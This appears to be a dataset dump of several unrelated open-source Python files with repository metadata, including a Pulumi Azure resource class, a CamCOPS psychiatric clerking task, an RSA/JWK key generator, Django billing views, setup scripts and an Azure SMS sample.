def properties(self) -> Optional[pulumi.Input['ManagementConfigurationPropertiesArgs']]:
"""
Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
"""
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: Optional[pulumi.Input['ManagementConfigurationPropertiesArgs']]):
pulumi.set(self, "properties", value)
class ManagementConfiguration(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
management_configuration_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['ManagementConfigurationPropertiesArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The container for solution.
API Version: 2015-11-01-preview.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] management_configuration_name: User Management Configuration Name.
:param pulumi.Input[pulumi.InputType['ManagementConfigurationPropertiesArgs']] properties: Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
:param pulumi.Input[str] resource_group_name: The name of the resource group to get. The name is case insensitive.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ManagementConfigurationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The container for solution.
API Version: 2015-11-01-preview.
:param str resource_name: The name of the resource.
:param ManagementConfigurationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ManagementConfigurationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
management_configuration_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['ManagementConfigurationPropertiesArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ManagementConfigurationArgs.__new__(ManagementConfigurationArgs)
__props__.__dict__["location"] = location
__props__.__dict__["management_configuration_name"] = management_configuration_name
__props__.__dict__["properties"] = properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:operationsmanagement/v20151101preview:ManagementConfiguration")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ManagementConfiguration, __self__).__init__(
'azure-native:operationsmanagement:ManagementConfiguration',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ManagementConfiguration':
"""
Get an existing ManagementConfiguration resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ManagementConfigurationArgs.__new__(ManagementConfigurationArgs)
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return ManagementConfiguration(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.ManagementConfigurationPropertiesResponse']:
"""
Properties for ManagementConfiguration object supported by the OperationsManagement resource provider.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"noreply@github.com"
] | bpkgoud.noreply@github.com |
55d3dc367b251fb1c170bfef1057404c2ca9ef36 | 6b29dbfe527d9e1950d53fde913e05e2a58758ab | /server/tasks/psychiatricclerking.py | caa5891fab78b1c238c1181e21bf8b1e2a48cc8f | [
"Apache-2.0"
] | permissive | parijatsahai/camcops | d7b2843b77bedee87b8298138bc8a33fe66c5178 | 09c7000060b546ad22b908e4245b1ff02940dd63 | refs/heads/master | 2021-01-21T09:20:43.670032 | 2015-07-02T15:42:59 | 2015-07-02T15:42:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,976 | py | #!/usr/bin/python2.7
# -*- encoding: utf8 -*-
"""
Copyright (C) 2012-2015 Rudolf Cardinal (rudolf@pobox.com).
Department of Psychiatry, University of Cambridge.
Funded by the Wellcome Trust.
This file is part of CamCOPS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pythonlib.rnc_web as ws
from cc_modules.cc_string import WSTRING
from cc_modules.cc_task import (
CLINICIAN_FIELDSPECS,
STANDARD_TASK_FIELDSPECS,
Task,
)
# =============================================================================
# PsychiatricClerking
# =============================================================================
class PsychiatricClerking(Task):
FIELDSPEC_A = CLINICIAN_FIELDSPECS
FIELDSPEC_B = [
dict(name="location", cctype="TEXT"),
dict(name="contact_type", cctype="TEXT"),
dict(name="reason_for_contact", cctype="TEXT"),
dict(name="presenting_issue", cctype="TEXT"),
dict(name="systems_review", cctype="TEXT"),
dict(name="collateral_history", cctype="TEXT"),
]
FIELDSPEC_C = [
dict(name="diagnoses_psychiatric", cctype="TEXT"),
dict(name="diagnoses_medical", cctype="TEXT"),
dict(name="operations_procedures", cctype="TEXT"),
dict(name="allergies_adverse_reactions", cctype="TEXT"),
dict(name="medications", cctype="TEXT"),
dict(name="recreational_drug_use", cctype="TEXT"),
dict(name="family_history", cctype="TEXT"),
dict(name="developmental_history", cctype="TEXT"),
dict(name="personal_history", cctype="TEXT"),
dict(name="premorbid_personality", cctype="TEXT"),
dict(name="forensic_history", cctype="TEXT"),
dict(name="current_social_situation", cctype="TEXT"),
]
FIELDSPEC_MSE = [
dict(name="mse_appearance_behaviour", cctype="TEXT"),
dict(name="mse_speech", cctype="TEXT"),
dict(name="mse_mood_subjective", cctype="TEXT"),
dict(name="mse_mood_objective", cctype="TEXT"),
dict(name="mse_thought_form", cctype="TEXT"),
dict(name="mse_thought_content", cctype="TEXT"),
dict(name="mse_perception", cctype="TEXT"),
dict(name="mse_cognition", cctype="TEXT"),
dict(name="mse_insight", cctype="TEXT"),
]
FIELDSPEC_PE = [
dict(name="physical_examination_general", cctype="TEXT"),
dict(name="physical_examination_cardiovascular", cctype="TEXT"),
dict(name="physical_examination_respiratory", cctype="TEXT"),
dict(name="physical_examination_abdominal", cctype="TEXT"),
dict(name="physical_examination_neurological", cctype="TEXT"),
]
FIELDSPEC_D = [
dict(name="assessment_scales", cctype="TEXT"),
dict(name="investigations_results", cctype="TEXT"),
]
FIELDSPEC_E = [
dict(name="safety_alerts", cctype="TEXT"),
dict(name="risk_assessment", cctype="TEXT"),
dict(name="relevant_legal_information", cctype="TEXT"),
]
FIELDSPEC_F = [
dict(name="current_problems", cctype="TEXT"),
dict(name="patient_carer_concerns", cctype="TEXT"),
dict(name="impression", cctype="TEXT"),
dict(name="management_plan", cctype="TEXT"),
dict(name="information_given", cctype="TEXT"),
]
for fslist in [FIELDSPEC_B, FIELDSPEC_C,
FIELDSPEC_MSE, FIELDSPEC_PE,
FIELDSPEC_D, FIELDSPEC_E, FIELDSPEC_F]:
for d in fslist:
d["comment"] = d["name"]
# DO NOT write to FIELDSPEC_A like this, because that overwrite
# CLINICIAN_FIELDSPECS.
@classmethod
def get_tablename(cls):
return "psychiatricclerking"
@classmethod
def get_taskshortname(cls):
return "Clerking"
@classmethod
def get_tasklongname(cls):
return "Psychiatric clerking"
@classmethod
def get_fieldspecs(cls):
return (
STANDARD_TASK_FIELDSPECS
+ PsychiatricClerking.FIELDSPEC_A
+ PsychiatricClerking.FIELDSPEC_B
+ PsychiatricClerking.FIELDSPEC_C
+ PsychiatricClerking.FIELDSPEC_MSE
+ PsychiatricClerking.FIELDSPEC_PE
+ PsychiatricClerking.FIELDSPEC_D
+ PsychiatricClerking.FIELDSPEC_E
+ PsychiatricClerking.FIELDSPEC_F
)
def get_ctv_heading(self, wstringname):
return {
"heading": ws.webify(WSTRING(wstringname)),
"skip_if_no_content": False
}
def get_ctv_subheading(self, wstringname):
return {
"subheading": ws.webify(WSTRING(wstringname)),
"skip_if_no_content": False
}
def get_ctv_description_content(self, x):
return {
"description": ws.webify(WSTRING(x)),
"content": ws.webify(getattr(self, x))
}
def get_clinical_text(self):
FIELDS_B = [x["name"] for x in PsychiatricClerking.FIELDSPEC_B]
FIELDS_C = [x["name"] for x in PsychiatricClerking.FIELDSPEC_C]
FIELDS_MSE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_MSE]
FIELDS_PE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_PE]
FIELDS_D = [x["name"] for x in PsychiatricClerking.FIELDSPEC_D]
FIELDS_E = [x["name"] for x in PsychiatricClerking.FIELDSPEC_E]
FIELDS_F = [x["name"] for x in PsychiatricClerking.FIELDSPEC_F]
dictlist = []
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_current_contact"))
for x in FIELDS_B:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_background"))
for x in FIELDS_C:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_examination_investigations"))
dictlist.append(self.get_ctv_subheading("mental_state_examination"))
for x in FIELDS_MSE:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_subheading("physical_examination"))
for x in FIELDS_PE:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_subheading(
"assessments_and_investigations"))
for x in FIELDS_D:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_risk_legal"))
for x in FIELDS_E:
dictlist.append(self.get_ctv_description_content(x))
dictlist.append(self.get_ctv_heading(
"psychiatricclerking_heading_summary_plan"))
for x in FIELDS_F:
dictlist.append(self.get_ctv_description_content(x))
return dictlist
def is_complete(self):
return True
def heading(self, wstringname):
return u'<div class="heading">{}</div>'.format(WSTRING(wstringname))
def subheading(self, wstringname):
return u'<div class="subheading">{}</div>'.format(WSTRING(wstringname))
def subsubheading(self, wstringname):
return u'<div class="subsubheading">{}</div>'.format(
WSTRING(wstringname))
def subhead_text(self, fieldname):
return self.subheading(fieldname) + u'<div><b>{}</b></div>'.format(
ws.webify(getattr(self, fieldname))
)
def subsubhead_text(self, fieldname):
return self.subsubheading(fieldname) + u'<div><b>{}</b></div>'.format(
ws.webify(getattr(self, fieldname))
)
def get_task_html(self):
# Avoid tables - PDF generator crashes if text is too long.
# FIELDS_A = [x["name"] for x in PsychiatricClerking.FIELDSPEC_A]
FIELDS_B = [x["name"] for x in PsychiatricClerking.FIELDSPEC_B]
FIELDS_C = [x["name"] for x in PsychiatricClerking.FIELDSPEC_C]
FIELDS_MSE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_MSE]
FIELDS_PE = [x["name"] for x in PsychiatricClerking.FIELDSPEC_PE]
FIELDS_D = [x["name"] for x in PsychiatricClerking.FIELDSPEC_D]
FIELDS_E = [x["name"] for x in PsychiatricClerking.FIELDSPEC_E]
FIELDS_F = [x["name"] for x in PsychiatricClerking.FIELDSPEC_F]
html = self.get_standard_clinician_block()
# for x in FIELDS_A:
# html += self.subsubhead_text(x)
html += self.heading("psychiatricclerking_heading_current_contact")
for x in FIELDS_B:
html += self.subhead_text(x)
html += self.heading("psychiatricclerking_heading_background")
for x in FIELDS_C:
html += self.subhead_text(x)
html += self.heading(
"psychiatricclerking_heading_examination_investigations")
html += self.subheading("mental_state_examination")
for x in FIELDS_MSE:
html += self.subsubhead_text(x)
html += self.subheading("physical_examination")
for x in FIELDS_PE:
html += self.subsubhead_text(x)
for x in FIELDS_D:
html += self.subhead_text(x)
html += self.heading("psychiatricclerking_heading_risk_legal")
for x in FIELDS_E:
html += self.subhead_text(x)
html += self.heading("psychiatricclerking_heading_summary_plan")
for x in FIELDS_F:
html += self.subhead_text(x)
return html
| [
"rudolf@pobox.com"
] | rudolf@pobox.com |
bce6b7949363087074d3daaff106c143744040a5 | aa81ba4d6ae20dee412acb24b5ee0eccb502767f | /venv/bin/jwk_create.py | 35c37f0a49523cc2709765191324b825386ec5fa | [] | no_license | CarlosGonzalezLuzardo/SECAS | 32c3e0b9c176333d2c20b7b3fed3adc9de8c0216 | 4455de4eb61fb4bddf6cfa8a4ce9e5f9f8e9d812 | refs/heads/master | 2020-03-14T11:11:33.922067 | 2018-06-14T10:54:14 | 2018-06-14T10:54:14 | 131,585,370 | 0 | 2 | null | 2018-05-08T13:51:43 | 2018-04-30T11:00:45 | Python | UTF-8 | Python | false | false | 1,300 | py | #!/home/alejandro/Proyectos/SECAS/Internals/derimanfranco/py-multifactor/venv/bin/python
import json
from Cryptodome.PublicKey import RSA
import argparse
import os
from jwkest.jwk import RSAKey
__author__ = 'rolandh'
def create_and_store_rsa_key_pair(name="pyoidc", path=".", size=1024):
key = RSA.generate(size)
keyfile = os.path.join(path, name)
f = open("%s.key" % keyfile, "w")
f.write(key.exportKey("PEM"))
f.close()
f = open("%s.pub" % keyfile, "w")
f.write(key.publickey().exportKey("PEM"))
f.close()
rsa_key = RSAKey(key=key)
rsa_key.serialize()
# This will create JWK from the public RSA key
jwk_spec = json.dumps(rsa_key.to_dict(), "enc")
f = open(keyfile + ".jwk", "w")
f.write(str(jwk_spec))
f.close()
return key
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-n', dest="name", default="pyoidc",
help="file names")
parser.add_argument('-p', dest="path", default=".",
help="Path to the directory for the files")
parser.add_argument('-s', dest="size", default=1024,
help="Key size", type=int)
args = parser.parse_args()
create_and_store_rsa_key_pair(args.name, args.path, args.size)
| [
"carlos.gonzalez@edosoft.es"
] | carlos.gonzalez@edosoft.es |
1f7e38df13d990b7710695bc820c7e9bb278fe64 | a554605ff97c7b688f457a8493d521d2c54101a3 | /scripts/ratatosk_run.py | 83c4c4149ac0757140b8531bb94696f183e417ec | [
"Apache-2.0"
] | permissive | SciLifeLab/ratatosk | 9c0c9b15cc0bf1c515bb5144f38ada3dd02e9610 | 4e9c9d8dc868b19a7c70eb7b326422c87bc3d7c0 | refs/heads/master | 2020-12-25T09:57:52.696398 | 2013-03-25T13:42:36 | 2013-03-25T13:42:36 | 8,794,985 | 0 | 0 | null | 2013-03-25T13:43:17 | 2013-03-15T08:36:17 | Python | UTF-8 | Python | false | false | 850 | py | import luigi
import os
import sys
import ratatosk.lib.align.bwa
import ratatosk.lib.tools.gatk
import ratatosk.lib.tools.samtools
import ratatosk.lib.tools.picard
from ratatosk.pipeline.haloplex import HaloPlex
from ratatosk.pipeline.align import AlignSeqcap
from ratatosk.pipeline import config_dict
if __name__ == "__main__":
if len(sys.argv) > 1:
task = sys.argv[1]
else:
task = None
if task == "HaloPlex":
args = sys.argv[2:] + ['--config-file', config_dict['haloplex']]
luigi.run(args, main_task_cls=ratatosk.pipeline.haloplex.HaloPlex)
elif task == "AlignSeqcap":
args = sys.argv[2:] + ['--config-file', config_dict['seqcap']]
luigi.run(args, main_task_cls=ratatosk.pipeline.align.AlignSeqcap)
# Whatever other task/config the user wants to run
else:
luigi.run()
| [
"per.unneberg@scilifelab.se"
] | per.unneberg@scilifelab.se |
1fbde5a70e2caec3b5424736dc0badecdc100998 | 12ec7d731a465e43ad211235882e2939cc5c031d | /bills/views.py | b359ced2a2b590bdfc286341744e1b28bc9da6a3 | [] | no_license | munikarmanish/merojob-bill | 770101e3c42be46569f26037d5e012065aa94392 | 882dd2aeafd1030f38d2d679268607b48c6a84aa | refs/heads/master | 2021-01-19T05:41:44.926766 | 2017-01-15T05:27:09 | 2017-01-15T05:27:09 | 78,848,703 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,658 | py | from django.contrib.auth.mixins import LoginRequiredMixin
from django.urls import reverse_lazy
from django.views import generic
from clients.models import Client
from .forms import BillForm
from .models import Bill
class CreateView(LoginRequiredMixin, generic.edit.CreateView):
template_name = 'bills/bill_form.html'
model = Bill
form_class = BillForm
success_url = reverse_lazy('bills:list')
def get_context_data(self, **kwargs):
context = super(CreateView, self).get_context_data(**kwargs)
context['page_title'] = 'Add bill'
return context
def get_initial(self):
initial = super(CreateView, self).get_initial()
# Check if client is already given
client_id = self.request.GET.get('client_id')
if client_id:
try:
initial['client'] = Client.objects.get(id=client_id)
except Client.DoesNotExist:
pass
return initial
class UpdateView(LoginRequiredMixin, generic.edit.UpdateView):
template_name = 'bills/bill_form.html'
model = Bill
form_class = BillForm
success_url = reverse_lazy('bills:list')
def get_context_data(self, **kwargs):
context = super(UpdateView, self).get_context_data(**kwargs)
context['page_title'] = 'Edit bill'
return context
class DeleteView(LoginRequiredMixin, generic.edit.DeleteView):
model = Bill
success_url = reverse_lazy('bills:list')
class ListView(generic.ListView):
template_name = 'bills/bill_list.html'
context_object_name = 'bills'
def get_queryset(self):
return Bill.objects.order_by('-created')
| [
"munikarmanish@gmail.com"
] | munikarmanish@gmail.com |
8d4f206ec3a0026c9b1da9c8a234299dde23340e | fb1ea456040a36037c3be87ffdc51dc3d8aaa7bb | /setup.py | 3e2e04ec60eb274e3400eb0d1b155cd61204cfe3 | [
"MIT"
] | permissive | rpatterson/python-main-wrapper | badfb894afe7980afb261bda9d3ce84af39e8a10 | eb549cee920bf144c4021632f7784b7d425b6c40 | refs/heads/master | 2023-09-05T04:26:53.052777 | 2021-09-21T18:45:00 | 2021-09-21T18:45:00 | 259,238,110 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,905 | py | """
main wrapper foundation or template, distribution/package metadata.
"""
import setuptools
with open("README.rst", "r") as readme:
LONG_DESCRIPTION = readme.read()
tests_require = ["six", 'contextlib2;python_version<"3"']
setuptools.setup(
name="main-wrapper",
author="Ross Patterson",
author_email="me@rpatterson.net",
description=(
"Set up global environment and run another script within, "
"ala pdb, profile, etc.."
),
long_description=LONG_DESCRIPTION,
long_description_content_type="text/x-rst",
url="https://github.com/rpatterson/python-main-wrapper",
license="MIT",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Utilities",
],
python_requires=">=2.7",
packages=setuptools.find_packages("src"),
package_dir={"": "src"},
use_scm_version=dict(
write_to="src/mainwrapper/version.py",
local_scheme="no-local-version",
),
setup_requires=[
'setuptools_scm;python_version>="3"',
# BBB: Python 2.7 compatibility
'setuptools_scm<6;python_version<"3"',
],
install_requires=["six", 'pathlib2;python_version<"3"'],
tests_require=tests_require,
extras_require=dict(
dev=tests_require
+ [
"pytest",
"pre-commit",
"coverage",
"flake8",
"autoflake",
"autopep8",
'flake8-black;python_version>="3"',
"rstcheck",
]
),
entry_points=dict(console_scripts=["python-main-wrapper=mainwrapper:main"]),
)
| [
"me@rpatterson.net"
] | me@rpatterson.net |
1e1adf50d4442520f05210a93462a543e4675b11 | 8ca19f1a31070738b376c0370c4bebf6b7efcb43 | /office365/sharepoint/gtp/base_request_options.py | 85faaf6e47d578df5eec240a8462c7370a7235db | [
"MIT"
] | permissive | vgrem/Office365-REST-Python-Client | 2ef153d737c6ed5445ba1e446aeaec39c4ef4ed3 | cbd245d1af8d69e013c469cfc2a9851f51c91417 | refs/heads/master | 2023-09-02T14:20:40.109462 | 2023-08-31T19:14:05 | 2023-08-31T19:14:05 | 51,305,798 | 1,006 | 326 | MIT | 2023-08-28T05:38:02 | 2016-02-08T15:24:51 | Python | UTF-8 | Python | false | false | 110 | py | from office365.runtime.client_value import ClientValue
class BaseGptRequestOptions(ClientValue):
""""""
| [
"vvgrem@gmail.com"
] | vvgrem@gmail.com |
f03ceb97b4ae1e32b9355c096ce23972956537e2 | 1a166165ab8287d01cbb377a13efdb5eff5dfef0 | /sdk/communication/azure-communication-sms/samples/send_sms_to_multiple_recipients_sample.py | 6254d388103c13c07088107f6e0a113ee9601b20 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | manoj0806/azure-sdk-for-python | 7a14b202ff80f528abd068bf50334e91001a9686 | aab999792db1132232b2f297c76800590a901142 | refs/heads/master | 2023-04-19T16:11:31.984930 | 2021-04-29T23:19:49 | 2021-04-29T23:19:49 | 363,025,016 | 1 | 0 | MIT | 2021-04-30T04:23:35 | 2021-04-30T04:23:35 | null | UTF-8 | Python | false | false | 2,093 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: send_sms_to_multiple_recipients_sample.py
DESCRIPTION:
This sample demonstrates sending an SMS message to multiple recipients. The SMS client is
authenticated using a connection string.
USAGE:
python send_sms_to_multiple_recipients_sample.py
Set the environment variable with your own value before running the sample:
1) AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING - the connection string in your ACS account
"""
import os
import sys
from azure.communication.sms import SmsClient
sys.path.append("..")
class SmsMultipleRecipientsSample(object):
connection_string = os.getenv("AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING")
phone_number = os.getenv("AZURE_COMMUNICATION_SERVICE_PHONE_NUMBER")
def send_sms_to_multiple_recipients(self):
sms_client = SmsClient.from_connection_string(self.connection_string)
# calling send() with sms values
sms_responses = sms_client.send(
from_=self.phone_number,
to=[self.phone_number, self.phone_number],
message="Hello World via SMS",
enable_delivery_report=True, # optional property
tag="custom-tag") # optional property
for sms_response in sms_responses:
if (sms_response.successful):
print("Message with message id {} was successful sent to {}"
.format(sms_response.message_id, sms_response.to))
else:
print("Message failed to send to {} with the status code {} and error: {}"
.format(sms_response.to, sms_response.http_status_code, sms_response.error_message))
if __name__ == '__main__':
sample = SmsMultipleRecipientsSample()
sample.send_sms_to_multiple_recipients()
| [
"noreply@github.com"
] | manoj0806.noreply@github.com |
9f3aba0a3fae8aebb7bce9c64a27e7c4c956ea66 | 480d67d9a3d0dfacc3cf8103450dae1669a52d9e | /setup.py | 42aa82870668e6346f68ebd84546f18e48abbd35 | [] | no_license | alenzhao/probabilistic2020 | 3045261e8855b959e50357edd7533ec4af5b5294 | f748fad88e50e5229eb765ac59cf731a734e22e2 | refs/heads/master | 2021-01-12T17:58:40.989527 | 2016-10-12T19:46:52 | 2016-10-12T19:46:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,029 | py | #from distutils.core import setup
from setuptools import setup
from distutils.extension import Extension
import sys
# fix problems with pythons terrible import system
import os
file_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(file_dir, 'prob2020/cython'))
SRC_DIR = 'prob2020'
if '--use-cython' in sys.argv:
USE_CYTHON = True
sys.argv.remove('--use-cython')
else:
USE_CYTHON = False
import numpy as np
ext = '.pyx' if USE_CYTHON else '.cpp'
extensions = [
Extension(SRC_DIR + ".cython.uniform_kde",
[SRC_DIR +'/cython/uniform_kde'+ext],
language='c++',
include_dirs=[SRC_DIR + '/cython/',
np.get_include()]),
Extension(SRC_DIR + ".cython.gaussian_kde",
[SRC_DIR + '/cython/gaussian_kde'+ext],
language='c++',
include_dirs=[SRC_DIR + '/cython/',
np.get_include()]),
Extension(SRC_DIR + ".cython.cutils",
[SRC_DIR + "/cython/cutils"+ext],
language='c++',
include_dirs=[SRC_DIR + '/cpp/',
SRC_DIR + '/cython/',
np.get_include()])
]
if USE_CYTHON:
from Cython.Build import cythonize
extensions = cythonize(extensions)
if 'build_ext' in sys.argv:
# just build cython extension module if build_ext subcommand is used
setup(ext_modules = extensions)
else:
import prob2020
version = prob2020.__version__
AUTHOR = 'Collin Tokheim'
EMAIL = 'fake@gmail.com'
URL = 'https://github.com/KarchinLab/probabilistic2020'
DESCRIPTION = 'Probabilistic 20/20'
PACKAGES = [SRC_DIR, SRC_DIR + '.python',
SRC_DIR + '.cython', SRC_DIR + '.cpp',
SRC_DIR + '.console']
setup(name='probabilistic2020',
version=version,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
url=URL,
packages=PACKAGES,
license='JHU Academic Software License Agreement (free for non-commercial use)',
install_requires=['numpy', 'scipy', 'pandas', 'pysam'],
package_data={
SRC_DIR+'.console': ['*.R']
},
entry_points={
'console_scripts':[
'probabilistic2020 = prob2020.console.probabilistic2020:cli_main',
'mut_annotate = prob2020.console.annotate:cli_main',
'extract_gene_seq = prob2020.console.extract_gene_seq:cli_main',
'simulate_non_silent_ratio = prob2020.console.simulate_non_silent_ratio:cli_main'
]
},
long_description=open('README.rst').read(),
classifiers=['Topic :: Scientific/Engineering :: Bio-Informatics',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research'],
ext_modules=extensions
)
| [
"collintokheim@gmail.com"
] | collintokheim@gmail.com |
99dc3ac93eb4286545895911c78ca1aa95a714b8 | b7f8c050ca4ef10b1319afccb276e44cf18a2010 | /setup.py | 1507a4b936694833ed750ec7d982e98b8d7d4447 | [
"Apache-2.0"
] | permissive | dyna-dot/pyglottolog | 22496a2109cc2a775a67e78d8331883a0cfdac33 | 0f24f24a46d1f510c975337e4c0d8c23b357c8bd | refs/heads/master | 2020-08-14T20:59:10.473487 | 2019-09-18T10:15:34 | 2019-09-18T10:15:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,002 | py | from setuptools import setup, find_packages
setup(
name='pyglottolog',
version='2.2.2.dev0',
author='Robert Forkel',
author_email='forkel@shh.mpg.de',
description='python package for glottolog data curation',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
keywords='data linguistics',
license='Apache 2.0',
url='https://github.com/clld/pyglottolog',
packages=find_packages(where='src'),
package_dir={'': 'src'},
platforms='any',
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*',
include_package_data=True,
zip_safe=False,
entry_points={
'console_scripts': ['glottolog=pyglottolog.__main__:main'],
},
install_requires=[
'six>=1.9',
'csvw<=1.5.6; python_version < "3.5"',
'csvw>=1.5.6; python_version >= "3.5"',
'clldutils==2.8.0; python_version < "3.5"',
'clldutils>=2.8.0; python_version >= "3.5"',
'purl',
'pycldf==1.6.4; python_version < "3.5"',
'pycldf>=1.6.4; python_version >= "3.5"',
'sqlalchemy',
'tqdm',
'pybtex>=0.22',
'latexcodec',
'unidecode',
'whoosh',
'attrs>=18.1',
'pycountry>=18.12.8',
'termcolor',
'newick<=0.9.2; python_version < "3.5"',
'newick>=0.9.2; python_version >= "3.5"',
'markdown',
'bs4',
'requests',
'nameparser',
],
extras_require={
'dev': ['tox>=2.9', 'flake8', 'pep8-naming', 'wheel', 'twine'],
'test': ['mock>=2', 'pytest>=3.6', 'pytest-mock', 'pytest-cov'],
},
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| [
"xrotwang@googlemail.com"
] | xrotwang@googlemail.com |
8ad774489dd1562b14923368a5c82d5750bedd7f | 9a2fd5e27d3f811cb18763ed388c2d56ae9907b6 | /模块/模块位置.py | d578991757412884c3b1d2f838aa6ddc40aa2701 | [] | no_license | wzc-ob/PycharmProjects | 5297ce60bade883495e5dbdb614131d31c47682e | 09f5ad6004dbdc83d456cabd78b769fde13d5357 | refs/heads/master | 2020-05-05T07:12:38.789400 | 2019-04-06T10:06:08 | 2019-04-06T10:06:08 | 179,817,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # import sys
# print(sys.path)
# sys.path.append('D:\\PycharmProjects\\模块')#添加Apath为模块查找路径
import sys
sys.path.append('D:\\PycharmProjects\\模块')
import module_test
module_test.m_t_pr()
print('使用module_test模块中的变量:',module_test.name)
| [
"43775612+wzc-ob@users.noreply.github.com"
] | 43775612+wzc-ob@users.noreply.github.com |
19b090d3d81b3707480c416cd85aa5daae56416a | a77fcccb2e46f06842daab98f1057209fe506b18 | /BackJoonOnline/[BOJ]1543_문서검색.py | 1db73e8e2654d5f19a821041568e58ef2a692622 | [] | no_license | gan-ta/Algorithm | 0c55344a6eb8038c9247485a50bc6324e4ef4c3e | 80313278e6e8461891519fd556a65998939bc564 | refs/heads/master | 2023-05-27T17:03:28.236320 | 2021-06-14T18:48:35 | 2021-06-14T18:48:35 | 257,796,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | def calc_dp(n):
max_value = 0
